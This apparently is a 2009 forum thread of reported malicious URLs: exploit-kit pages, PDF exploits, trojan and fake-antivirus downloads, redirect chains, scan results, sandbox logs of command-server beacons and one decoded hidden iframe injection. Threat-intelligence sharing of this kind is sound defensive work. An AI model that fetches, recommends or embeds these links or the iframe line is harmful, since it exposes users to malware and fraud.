hackzona.info/s/index.phphttp://wepawet.iseclab.org/view.php?hash=dcac90e453678bee26d187e37474d291&t=1239872153&type=js
Pdf exploit/trojan:
http://liteautogreatest.cn/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=2030ec9e4312994722b9a2037911d8dc&t=1239819716&type=js
Domain listed on MDL but on different directory
d0lphin.biz/mix/pdf.phphttp://wepawet.iseclab.org/view.php?hash=5e69487565b54590dc4521945162dbe7&t=1239873022&type=js
Redirects to rogue:
sotoviy.info/0/go.php?sid=2
uouo.info/0/go.php?sid=2
leshik.info/0/go.php?sid=2
wazo.info/0/go.php?sid=2
lavo.info/0/go.php?sid=2
reliable-anti-virus.info/0/go.php?sid=2
webportal-sms.info/0/go.php?sid=2
spyware-guard.info/0/go.php?sid=2
spyware-soft.info/0/go.php?sid=2
spyware-security.info//0/go.php?sid=2all redirect to online scan:
loyal-porno.com/scan/?id=260
-
www.catch-you.ru/files/winsetup66.exehttp://www.virustotal.com/analisis/e63c9ea8320708d2dd2e705f6bf73da6 8/40
http://www.threatexpert.com/report.aspx?md5=6c05f6bd103d84523d6aea9d19b3f2cd
www.catch-you.ru/files/wingo.exehttp://www.virustotal.com/analisis/eb2b1f73f0f3ace4a8243aa46845cc91 18/40
www.catch-you.ru/files/ftp_non_crp.exehttp://www.virustotal.com/analisis/acd15fdd1fa850b4a0d162ebde7dadf2 35/40
www.catch-you.ru/files/ru12.exehttp://www.virustotal.com/de/analisis/a74d38aa72e78450b2eb46a299a72b8a 2/39
www.catch-you.ru/files/jnk.exehttp://www.virustotal.com/analisis/bf082a8a4632ea8d382d3fb756713b2a 13/39
www.catch-you.ru/files/pac2.exehttp://www.virustotal.com/analisis/5cc7f9b74b036bd4dc4975035711fd28 10/37
www.catch-you.ru/files/Winset20.exehttp://www.virustotal.com/analisis/f46ca5e54daa7244a134623b968c74b8 5/40
http://www.threatexpert.com/report.aspx?md5=b88e83a2fc5d229f0a3ed5e790c395e1
www.catch-you.ru/files/1000.exehttp://www.virustotal.com/analisis/02a62655684eb0bdeb9acd9a23deb80f 17/39
-
Exploit:
hxxp://beebest.cn/dlutrl23dnwfas/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=8c979b2883f0cf92419a4b342fff4545&t=1240050576&type=js)
PDF:
hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1240050583&type=js)
VirusTotal (http://www.virustotal.com/analisis/c6e2fe3fbaf95d5730763c3f4d819808) - 10/40 (25%)
Exe:
hxxp://beebest.cn/dlutrl23dnwfas/exe.php
VirusTotal (http://www.virustotal.com/analisis/e215d34b9667869918886503a1233011) - 7/40 (17.5%)
-
AV Antispyware rogue related sites
http://int.reporting32.com/stat.php?func=installrun&id=200002&landing=-1&lang=EN&sub=0
http://dl.scan-antispy-4pc.com/get/?pin=0&lnd=0&type=main
http://sales.mypaymentarea.com/MjAwMDAy_MA==_QkE0MjAxNEM5RTNCMjI3OEE2QkI=/YXZh/1
https://wisypay.net/purchase/?vendor=2&id=49eaa01f4444b
-
Redirects to exploits:
odmina.ru/?v=myid37&lid=1033http://wepawet.iseclab.org/view.php?hash=2a8ea1f1e331a0826ca485ab9e3232e3&t=1240038315&type=js
Redirect to exploits:
mixbunch.cn/thread.htmlhttp://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js
Exploits/trojan:
sunmaiamibich.ru/pupu/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628&type=js
Trojan:
tayforlive.ru/gh.exehttp://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037
Trojan:
feds-r-watching.us/load.php?id=0&spl=1.exedechttp://www.virustotal.com/analisis/8b1f9ae18260c2d50f447e34eef66e02
Redirect to rogue:
spyware-files.info/0/go.php?sid=2
spyware-file.info/0/go.php?sid=2
AV fraud:
http://loyalvideoz.com/scan/?id=260
-
Sites related to rogue application: Home Antivirus 2009
h-a-virus-2009.com
h-a-virus2009.com
h-anti-virus-2009.com
h-anti-virus2009.com
h-antivirus2009.com
h-avirus2009.com
ha-virus2009.com
hanti-virus2009.com
hantivirus2009.com
havirus2009.com
home-a-v-2009.com
home-a-virus-2009.com
home-anti-v2009.com
home-anti-virus-2009.com
home-anti-virus2009.com
home-antiv2009.com
home-antivirus2009.com
home-av-2009.com
home-av2009.com
home-avirus2009.com
homeanti-virus-2009.com
homeantiv2009.com
homeantivirus2009.com
homeav-2009.com
homeav2009.com
homeavirus-2009.com
homeavirus2009.com
-
Exploit/trojan:
yes-exploit.ru/include/spl.phphttp://wepawet.cs.ucsb.edu/view.php?hash=a4e75eb21b28ff23ca48d8d41dad895c&t=1240269807&type=js
Trojan:
125.87.2.125/mt/load.php?id=1http://www.virustotal.com/analisis/b973239d38eb93711e46ab7c8d7d8c60
-
coolwallpapers.statusinfotech.com/ppi/install.exehttp://virscan.org/report/6fcf3670f1e511be8925b19d176205dc.html 14/38
-
sb123.8800.org/files/6.loghttp://virscan.org/report/40e37183b23ef501c8c163b35a101441.html 2/38
http://www.threatexpert.com/report.aspx?md5=09cf1539317a107b134595f404aafdb2
ipkipk.3322.org/ipk.exehttp://virscan.org/report/711955885ef09950a2dd07800447e45e.html 9/38
-
209.44.126.29
Redirects to exploits:
hxxp://individualpeople.biz/go.php?sid=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240399179&type=js)
Exploits:
hxxp://individualpeople.biz/go.php?sid=6
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js)
PDF Exploits:
hxxp://209.44.126.30/unsecurity/pdf.php?id=19663
File name: 1.pdf
File size: 7324 bytes
MD5: be9a4f50c3fb024a170b9ec53dd712d4
VirusTotal (http://www.virustotal.com/analisis/9affe859e1ca7d88b7a21f542ede998d) - 15/40 (37.5%)
Trojan:
hxxp://209.44.126.30/unsecurity/load.php?id=19663
File name: load.exe
File size: 94208 bytes
MD5: 47c0c6c2ce07c291651070b03dd83d7f
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/3124e314d118f381c25da0d51dab676a) - 29/40 (72.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=172499a592cac0b249dde8fc2e3eed994)
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net]
Request: GET /banner/crcmds/main
Response: 200 "OK"
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn]
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"
-
xy1.gac4a.com/01/v.exehttp://www.virustotal.com/analisis/a441100772fc53ac9df07971ce444d7e 23/39
-
JS IFRAME
hxxp://counnter.cn/top100_00.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=c52bd9668a5eee067b99975751391185&t=1240427410&type=js)
Exploits:
hxxp://counnter.cn/z/count.php?o=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253)
Exploits:
hxxp://counnter.cn/z/exploits/x9.php?zenturi=1
hxxp://counnter.cn/z/exploits/x7b.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=49757767a3408050c3f82314a919217c&t=1240428143&type=js)
Jsunpack (http://jsunpack.jeek.org/dec/go?url=counnter.cn_z_exploits_x7b.php)
Exploits (x15b.zip):
hxxp://counnter.cn/z/exploits/x15b.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/735e8f07bf3a55fc8d0ba70ee71379f6) 33/40 (82.5%)
Trojan (getexe.exe):
hxxp://counnter.cn/z/getexe.exe?o=1&t=1239892730&i=2154770527&e=10
VirusTotal: Trojan (http://www.virustotal.com/analisis/34f3b96711f909d233f51ac7335f3fc3) - 15/40 (37.5%)
-
w.94saomm.com/js.jsredirects to
www.10555.com/tv/fs.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=5380b380d7481ff7234b4cc9af6609c0&t=1240429053&type=js
various exploits lead to
b.wuc9.com/ac.csshttp://www.virustotal.com/analisis/a3fdd8fcaa34c553ea0f7864296c4628 23/40
-
hxxp://www.edfvc.com
Comes up with Mal/Obfjs-AE with Sophos
http://www.sophos.com/security/analyses/viruses-and-spyware/malobfjsae.html
Obfuscated JS resolves to:
<iframe src="hxxp://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
MysteryFCM: Encased iFrame HTML in BBCode "CODE" tags.
-
zbot:
zss5dfggd.com/exe/ue.exehttp://www.virustotal.com/analisis/d5ba440a4de0b771088cd4b3714dbfae
Trojan:
zss5dfggd.com/exe/9.exehttp://www.virustotal.com/analisis/cafeb16b4df77833b8b1218f2f30b3ea
Trojan:
zss5dfggd.com/exe/lich.exehttp://www.virustotal.com/analisis/dde89e65277fe2cab50bc054c4c1e499
Trojan:
zss5dfggd.com/exe/gld.exehttp://www.virustotal.com/analisis/c48f145c65c717fcf4b750ae2c7cdd89
Trojan:
zss5dfggd.com/exe/mp.exehttp://www.virustotal.com/analisis/862f2e619d840b98a6e359e2ddb84f24
Fake AV:
winpcdown9.com/pcdef.exehttp://www.virustotal.com/analisis/ad13d92e29f9521c6ae48760ea106ed9
and the payment site it use:
billingpayment.net/pp/?id=
Fake online scan:
litetubevideoz.com/scanand the trojan that is downloaded:
litetubevideoz.com/codec.exehttp://www.virustotal.com/analisis/7b25de92bab8faf17a0da0acd7464afb
trojan:
litetubevideoz.com/null/exe2/3913443.exehttp://www.virustotal.com/analisis/4ba420744c78124fe6c00a28045628ae
Fake online scan:
online-spyware-scan.net/online-scan.html?ewmid=226
-
from banner ads to fake av
perfect-banner.com/www/images/300x250_uof_2.swf?clickTARGET=_blank&clickTAG=http://perfect-banner.com/www/delivery/ck.php?oaparams=2__bannerid=250__zoneid=171__cb=c8b86ececehttp://wepawet.iseclab.org/view.php?hash=17501d47ade222cffa45fc0f2f7c84bc&type=swf
swf redirects to
enjoyspringtime.com/?cmpid=dologology
redirects to
crustat.com/ts/in.cgi?mfcdologology&se=oth&ur=1&HTTP_REFERER=enj-cmpid%3Ddologology
redirects to
pnfzetnax.net/pro/dologology/
redirects to
78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78
redirects to
78.47.132.220/a82a/cr/adv/142/index.html
78.47.132.220/a82a/cr/srm_free_setup.exehttp://www.virustotal.com/de/analisis/07fe8c68d017097af9ec74ebb8cc1dc6 18/40
MD5...: 66c7e910330c631ba4515781f44e2788
-
Exploits/Pinch trojan:
indiasportnews.com/mt/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=4bb0a47f5b7fefbf32bb501c2f314bc0&t=1240532359&type=js
Trojan:
crisiss.net/at.exehttp://www.virustotal.com/analisis/7fcd8acc15681586603bbb368a75fd54
Fake AV - pretty big one,5.8MB
setup.malwareremovalbot.com/setup.exehttp://www.virustotal.com/analisis/cf5ed54f4ec27bc84aaa528f50dd750a
-
Redirects to trojan:
hxxp://zbesttds.com/in.cgi?3
hxxp://zbesttds.com/in.cgi?4
Wepawet (http://wepawet.iseclab.org/view.php?hash=8f02ba1f78de6938def093f3e1c0d3c1&t=1240567079&type=js)
hxxp://zbesttds.com/in.cgi?5
hxxp://400.myfilehostings.net/movie.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=6f34c32530fef1bf4e158c4f8c03f0e5&t=1240568871&type=js)
hxxp://tafficbots.com/in.cgi?8
hxxp://tafficbots.com/in.cgi?9
Wepawet (http://wepawet.iseclab.org/view.php?hash=b94025b4f058045a56a43069a3e1bfed&t=1240569469&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=633582e4121c69b1958525add78f77de&t=1240569515&type=js)
Trojan:
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/3.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/4.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/6.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/7.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/8.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/9.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424103022287492/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241031340125215/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241035734251381/1.gif
Size: 125440 bytes,
MD5: f4342703b051c0ea1c81f0330f10dc3f
VirusTotal (http://www.virustotal.com/analisis/acfa3c724c289794d4a89ba772b69811) - 30/40 (75%)
*****************
Redirects to google:
hxxp://zbesttds.com/in.cgi?11
hxxp://zbesttds.com/in.cgi?16
Wepawet (http://wepawet.iseclab.org/view.php?hash=332ec8368583bb2ce3be288e149dc3db&t=1240566551&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af20a07cd051895441993908c11e13ec&t=1240566589&type=js)
*****************
Redirects to rogue: (dead since a few hours)
hxxp://zbesttds.com/in.cgi?14
Wepawet (http://wepawet.iseclab.org/view.php?hash=cba930c84e61fb44e0f5d20bc30c0e95&t=1240566362&type=js)
*****************
Redirects to rogue:
hxxp://hitmidpoint.com/?accs=809&tid=1
hxxp://staritquick.com/in.cgi?13&gai=csptop&gli=100&gff=cs_362527174&al=
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d0150bd82c70819f998c387e76d1c2f&t=1240568055&type=js)
*****************
Redirects to fake codec page:
hxxp://delshiktds.com/in.cgi?3
hxxp://myhealtharea.cn/in.cgi?2
Fake codec page:
hxxp://xtube-download.freehostia.com/tube.htm
Wepawet (http://wepawet.iseclab.org/view.php?hash=d3567427faceb030997915bee804c0cf&t=1240565964&type=js)
*****************
Redirects to fake codec page:
hxxp://tafficbots.com/in.cgi?7
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Fake codec page:
hxxp://megaporntubes09.com/xplaymovie.php?id=40011
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Trojan:
hxxp://lll-softportal.com/softwarefortubeview.40011.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/d9a5fd9a4915b87759a0544e7b8f97d3) - 7/40 (17.5%)
*****************
Redirects to rogue:
hxxp://kernelseo.com/in.cgi?default¶meter=up-file+download&se=15557
Wepawet (http://wepawet.iseclab.org/view.php?hash=4f32a80ccc9f49057e5d1a596bf6b010&t=1240385217&type=js)
-
http://antivir-scan-pro-best.com/11041/3/
http://files.load-archive-av-pro.com/normal/setup_11041_3_1.exe
http://int.sysproreport1.com/stat.php?func=installrun&id=11041&landing=-1&lang=EN&sub=1¬stat=1
http://dl.super-top-scan-pro.com/get/?pin=11041&lnd=-1&type=main
http://files.get-fails-load-av.com/release/setup.exe
http://dl.scan-anti-spy-4free.com/get/?pin=0&lnd=-1&type=scanner
-
music24shop.net/2/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=cbf9102477119497295d517be62e4053&t=1240651814&type=js
http://music24shop.net/2/pdf.phphttp://www.virustotal.com/analisis/08f4c49651626507490afd80932f4f71 1/38
music24shop.net/2/load.php?id=6http://www.virustotal.com/analisis/dd3c7093b2b0827d6ee987b83f015faa 7/40
-
Exploit/trojan:
wtopcompany.ru/cms/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=3f1acb074a6e8c6b03da890c06e1c4db&t=1240555768&type=js
Fake AV scan:
tubeontvgl.com/scan/?id=262whats downloaded from there:
uploadmoviez.com/codec.exehttp://www.virustotal.com/analisis/3a09d83950707cd8c0f4c23d913c0129
Same files on the same ip:
youngsters.ru/codec.exe
pc-codec-pack.com/codec.exe
suckitnow1.net/codec.exe
velzevuladmin.com/codec.exe
-
Rogue:
Snobelium.com
Diastolea.com
cussermono.com
-
Rogue:
Snobelium.com
Diastolea.com
cussermono.com
look like templates for future fake avs. there is no additional content than the page itself.
-
Rogue:
Snobelium.com
Diastolea.com
cussermono.com
look like templates for future fake avs. there is no additional content than the page itself.
yea i noticed that.
will have content in the future probably..
seem like irc bot/backdoor:
77.75.105.221/e-card/e-card.gif.exehttp://www.virustotal.com/analisis/335638c7877b9d21eabb7f5e12881fe9
-
For the fun of it...
hxxp://youarelucky.biz/SmartDownload.exe
http://www.virustotal.com/analisis/786657fbd9af08fef0cb1745bce68fa5
hxxp://200.122.168.229/dl/goldvipclub/TrackDownload.dll?DID=991392
http://www.virustotal.com/analisis/5d97aab77fba7ca6ab7ecf6728034a15
hxxp://200.122.168.229/dl/goldvipclub/
http://www.virustotal.com/analisis/aef4b913ccfbe8918e83a8ed48870ddd
-
This
http://neono.biz/myy/index.phpAnd this
http://tipojud.com/quq/1/loads.php?id=68
-
exploits:
hxxp://210.240.61.68/fish/GV14.htmWepawet (http://wepawet.iseclab.org/view.php?hash=3b005d98e244f3ac81a6f4e59c1ecb68&t=1240870109&type=js)
trojan:
hxxp://www.spps.hlc.edu.tw/fish/1.exeVirusTotal (http://www.virustotal.com/analisis/6e8ce06db44695743a9fc41859394f50) - 17/40 (42.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=10e108d39962a6ac4754702165f33b3e7)
-
'Greeting cards' (IRC bot/backdoor):
hxxp://greetings.3utilities.com/logs/greetings.exe
hxxp://66.83.239.226/E-Greetings.exe
-
Fake AV:
fullsecurityaction.com
Anytoplikedsite.com
yourpcshield.com
totalvirushield.com
myfirstsecurityscan.com
stopspyware.org
Exploit/trojan
78.47.132.221/l3/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=6f5cdfe1c1aeb5cd68a034c3c2984dc8&t=1240889755&type=js
Seems like koobface
70.254.41.230/setup.exehttp://www.virustotal.com/analisis/9dfc0bc4f3e5ea13ae76859d939a8fd8
-
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=
From the same ip:
hxxp://www.downloads-123.com/dyyhhj1g/3j2khf32/aap.exe
http://www.virustotal.com/analisis/85d89df7d1f11b6178ba112551a4c248
hxxp://downloads-123.com/guard.exe
http://www.virustotal.com/analisis/1e3f57b7808d6e154dcea62a6e53d2f0
Result: 1/40 (2.5%)
hxxp://91.207.61.12/stata/controller.php?action=bot&entity_list=
From the same ip:
hxxp://tomohappy.com/forum/data.php?id=500
hxxp://tomohappy.com/forum/data.php?id=5xx // where xx is whatever numeric value...
http://www.virustotal.com/analisis/97eb93b986035c20b613677ba6235136
Result: 13/40 (32.50%)
hxxp://goooodbill.cn/unig/load.php
http://www.virustotal.com/analisis/5b838bbb5899ae16758851bf33d7521c
Result: 15/40 (37.5%)
hxxp://myspyfiles.cn/qazwsx/index.php
Injection - redirects to the already listed rutraff.cn:
http://www.google.com/search?hl=en&q=myspyfiles.cn&btnG=Google+Search
hxxp://xcount.cc/ads/in.cgi?13
hxxp://weh8dnb.com/cp/index.php
hxxp://weh8dnb.com/cp/load.php
http://www.virustotal.com/analisis/143e40ce67aa7846b7a06ac080c6bb34
Result: 4/40 (10%)
-
sorwwwros.cn/life/t.php
sorwwwros.cn/life/fdoc.pdfhttp://www.virustotal.com/analisis/7e2777e6031abc9c55597bd880ad2f25 6/40
MD5...: 9de067ace8636a8a788a3925533e9660
http://wepawet.cs.ucsb.edu/view.php?hash=9de067ace8636a8a788a3925533e9660&type=js
sorwwwros.cn/life/fdem.swfhttp://www.virustotal.com/analisis/75ff201372b07627b2e00defa0739510 0/40
MD5...: c7c0f03b8a7fec6b163c501bcb4d8500
payload
sorwwwros.cn/life/l.php?b=4&s=PDFhttp://www.virustotal.com/analisis/0b67d1b488abcb478155d20ec2708633 17/40
MD5...: 84909a9d6cdc7c50cfd9da181232df7a
-
The...usual suspects:
hxxp://rxtraffclicks.com/download/1/1000/5
http://www.virustotal.com/analisis/4e670f047ca735c1e65f8e8aa458ca1f
Result: 15/40 (37.5%)
hxxp://pornosbest.com/movies/movie1.wmv.exe
http://www.virustotal.com/analisis/64bb880feb8b31a351c2809dc8549dde
Result: 12/40 (30%)
====================
These ones are currently being injected in unsuspected sites...for now,they all leed to (already listed) litevehiclemall.cn...
hxxp://betbigwager.cn/in.cgi?income61
hxxp://hotslotpot.cn/in.cgi?income65
hxxp://litecartop.cn/in.cgi?income70
hxxp://lotultimatebet.cn/in.cgi?income60
http://www.robtex.com/ip/213.163.91.93.html
http://www.bfk.de/bfk_dnslogger.html?query=213.163.91.93#result
And...
http://www.robtex.com/ip/213.182.197.23.html
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.23#result
Another one which is being injected...
hxxp://nyoflak.com/?click=3C5DCB
According to Wepawet,it also leads to "openstats.info":
http://wepawet.cs.ucsb.edu/view.php?hash=b8ace1842982cb47ee7a390120812436&t=1240920333&type=js
But someone didn't wanted to blacklist openstats.info few days earlier that i had mentioned it... ;D ;)
Yet one more:
hxxp://nipkelo.net/?click=5A158BD
The story in short - with even more domains to be blocked etc etc...
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
hxxp://simple-faq.cc/stat.js
hxxp://a-stone.biz/xZfmG3YK1/
hxxp://a-stone.biz/xZfmG3YK1/flash.php?id=1647&spl=14
hxxp://a-stone.biz/xZfmG3YK1/load.php?id=1647
http://www.virustotal.com/analisis/b9495d617e3535b2420d19e25ce1b57f
Result: 16/40 (40%)
Now,what i've found rather interesting...is what happens when quering a-stone.biz directly,via Wepawet...and without with simple-faq.cc referrer:
http://wepawet.cs.ucsb.edu/view.php?hash=5a514c44b04f33c1834083a2a05e1432&t=1240934612&type=js
Redirects
From
http://a-stone.biz/xZfmG3YK1/
To
http://grabberz.comIt's a small world out there... ;)
-
Another lameness which is being injected to sites out there...
hxxp://77.92.158.122/webmail/inc/web/index.php
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf
http://www.virustotal.com/analisis/29e7ee82e1302ef9559db58b41527755
Result: 14/40 (35%)
hxxp://77.92.158.122/webmail/inc/ -> Open dir...
-
hxxp://betbigwager.cn/in.cgi?income
hxxp://hotslotpot.cn/in.cgi?income
hxxp://litecarfinestsite.cn/in.cgi?income
hxxp://litecartop.cn/in.cgi?income
hxxp://lotultimatebet.cn/in.cgi?income
-
http://nhgfngfdhngf.com/fff9999.php?aid=40012&uid=e0905079d41d8cd98f00b204e9800998ecf8427e&os=512
http://imageempires.com/perce/1e20a980a5c00739dd84315d884c4d49081fa0501bd2a074be995820802939a85eec2ff8a432377ec/64d050a1229/perce.jpg
http://sphericalart.com/item/be3049005510b7d9dd4431fdd86c2d79b80fa0a0bbd2e034ae4908f0f02989a86eccafc8e45297bea/c4a07021c2e/item.gif
http://imagesmonitor.com/werber/e4d08081926/216.jpg
http://em.pc-on-internet.com/eas?camp=22768&ty=ct&popt1=1220&popt2=DE
http://download.web-mediaplayer.com/Web-MediaPlayer_setup.php?grpid=2053&tag_id=717&nums=FFjwag.AAA&popt1=1220&popt2=DE
Rogues
http://pcantimalware.com/PCAntiMalwareScannerSetup.exe
http://pc-privacydefender.com/PCPrivacyDefenderScannerSetup.exe
http://totalsystemguard.com/page.php?id=44
http://totalvirushield.com/download.php?affid=00000
http://totalvirushield.com/install/ws.zip
http://pro-scanner-antivir-free.com/11041/3/
http://files.loads-antiviral-files.com/normal/setup_11041_3_1.exe
Fake codecs
http://kokc-softportal.com/softwarefortubeview.40006.exe
http://uploadsmovies.com/codec/106.exe
-
Trojan:
secure123.org/img/winagent.exehttp://www.virustotal.com/analisis/cae7efe27fcd81c66f8e050b937de712
Trojan:
neirrela92-ammi.cn/it021.exehttp://www.virustotal.com/analisis/4cd315b8b8cbcd96802332a6ba59d90d
Trojan:
fddporn.net/6007_1.exehttp://www.virustotal.com/analisis/e2cdbb3586041e93705d5e88a3d72d42
fake AV:
fddporn.com/av.26.0.exehttp://www.virustotal.com/analisis/7f7dccb45937295dd11c73a989330b61
the fake AV website:
antiwareprotect.comthe fake payment site:
https://secure.paysecureorder.com/order?agree=on&prodid=2&r=1.0&butt=
Exploit/trojan:
karavan.us/bon/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=6b8c81232ad4b6589475d706c22a061a&t=1241050191&type=js
Exploit/trojan:
karavan.us/sng/cache/readme.pdfhttp://wepawet.cs.ucsb.edu/view.php?hash=3738291a02aadc69a7c9ed9e692d9b67&t=1241050218&type=js
-
http://neono.biz/opi/index.php
http://neono.biz/opi/cache/readme.pdf
http://neono.biz/opi/cache/flash.swf
http://neono.biz/opi/load.php
http://neono.biz/myy/load.php
-
hxxp://egangoff.com/images/pdf.php
hxxp://egangoff.com/images/builder.php - Flash
-
hxxp://liora.co.za/images/
http://wepawet.cs.ucsb.edu/view.php?hash=6751dee94cb3088705b66504d435a934&t=1241108619&type=js
http://www.virustotal.com/analisis/506618b146220329eb6ac64c552d0aed
-
bitcoreguard.net
bitcoreguard.com
guardlab.com
guardav.com
coreguard2009.com
coreguard2009.biz
coreguard2009.net
coreguardlab2009.biz
coreguardlab2009.net
coreguardlab2009.com
guardlab2009.biz
guardlab2009.net
guardlab2009.com
http://coreguard2009.com/coreguardd.exe
http://guardlab2009.com/InstallerWF.exe
Another interesting site from this gang??
just4yourtranquillity.com
-
hxxp://bigbargin.cn/file1.exe
And that's what happens to lamers still using MicroJoiner in 2009... ;D
http://www.virustotal.com/analisis/2977518dd680ba0acde393f6e9d58a10
From a well-known net neighbourhood...
hxxp://downfilg.com/in.cgi?2&a=1.exe // where "1" can be substituted with whatever string you want...
hxxp://keygroundc.com/download/1%2Eexe
http://www.virustotal.com/analisis/00f4e6ad59857e5d9a0920052317a471
-
Little bit of this and a little bit of that
http://fast-scanner-av-pro.com/11041/3/
http://thefullvirusscan.com/download.php?affid=08073
http://kekc-softportal.com/softwarefortubeview.40012.exe
http://upd.pccleansolution.com/?proto=4&rc=UAMS-0001-8882-7773&v=99.3.3.1&abbr=WBASE&platform=nt&os_version=5.1.2600.2.0&ac=B10511E3-DB89-4D8F-9666-5A0BA1ED885F&appid=UAMS&em=&pcid=2561334094&sv=
ReturnCode: 0
Text:
ProductVersion: 99.3.3.351
File:MalwareDB3510.exe,3871295,684586667,http://dl.setforinfo.com/updates/83/153/MalwareDB3510.exe
File:vbpv.dat,10,-830365698,http://dl.setforinfo.com/updates/83/153/vbpv.dat
File:update.script,143,-1272521259,http://scripts.setforinfo.com/update_script.php?ids=285_287
-
hxxp://prodownloadmanager.com/install.php
-
http://www.bfk.de/bfk_dnslogger.html?query=195.2.253.41#result
traff.loadmore.eu is already in list...
traff.loadd.in is Virut-related:
http://www.threatexpert.com/report.aspx?md5=4586242be6d360f577725e1487c2d7cf
http://www.prevx.com/filenames/1076913952874868034-X1/KEYGEN_SPYHUNTER.SECURITY.SUITE.V3.7.19%5B.html
And regarding the other 2 domains there...
hxxp://fineles.yourfoxlink.net/download/1.exe // ...very well-detected,you can change "1" to whatever string you want...
http://www.virustotal.com/analisis/9739b2f5e6adee880d9b86687d2c7ba1
Result: 34/40 (85%)
hxxp://yourfoxlink.net/files/1.exe // ...you can change "1" to whatever string you want...
hxxp://www.virustotal.com/analisis/d113e8d8aae448d9ebe320b7f9c15696
Result:10/40 (25%)
-
Trojans:
gertruweq.com/ee/gld.exehttp://www.virustotal.com/analisis/92dbc2bad00080a577cb17ecb7cfd7b2
gertruweq.com/ee/ret.exehttp://www.virustotal.com/analisis/9a8654be39f40883c05c6b44708596cd
gertruweq.com/ee/9.exehttp://www.virustotal.com/analisis/f3fc6085f437fb11591a79c2c1331e43
-
Exploit/trojan:
adul8tra.cn/forum/foxpdf.phphttp://wepawet.iseclab.org/view.php?hash=fbc7708cc988b8a5709796f83197a905&t=1241158354&type=js
k1l3r.ru/Y/include/spl.phphttp://wepawet.iseclab.org/view.php?hash=b673dbc9d832f66c67af103cb1dbf9e8&t=1240825850&type=js
-
hxxp://basesrv3.net/yes/load.phpVirusTotal: Trojan (http://www.virustotal.com/analisis/cba60d1c2b108f1e03a46518980a142d) - 21/38 (55.26%)
hxxp://ldj5.biz/fo/exe.phpVirusTotal: Trojan (http://www.virustotal.com/analisis/92b9ba7ab8d03b9f838879df541a8536) - 11/40 (27.50%)
------------
hxxp://pushtutempo.com/uniq3/loads.php?id=88VirusTotal: Trojan (http://www.virustotal.com/analisis/7c4dfa5c1e6c4f4c30a76d1f511416d6) - 4/40 (10%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=8fc9779acb3553505810fd40629b4695)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c4b733144334c6c411a26821be3fc633)
connect to:
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=&uid=&first=1&guid=13441600&rnd=3862340
hxxp://verringo.cn/bmngr2/controller.php?action=report&guid=0&rnd=3862340&uid=&entity=1239797538:unique_start
-
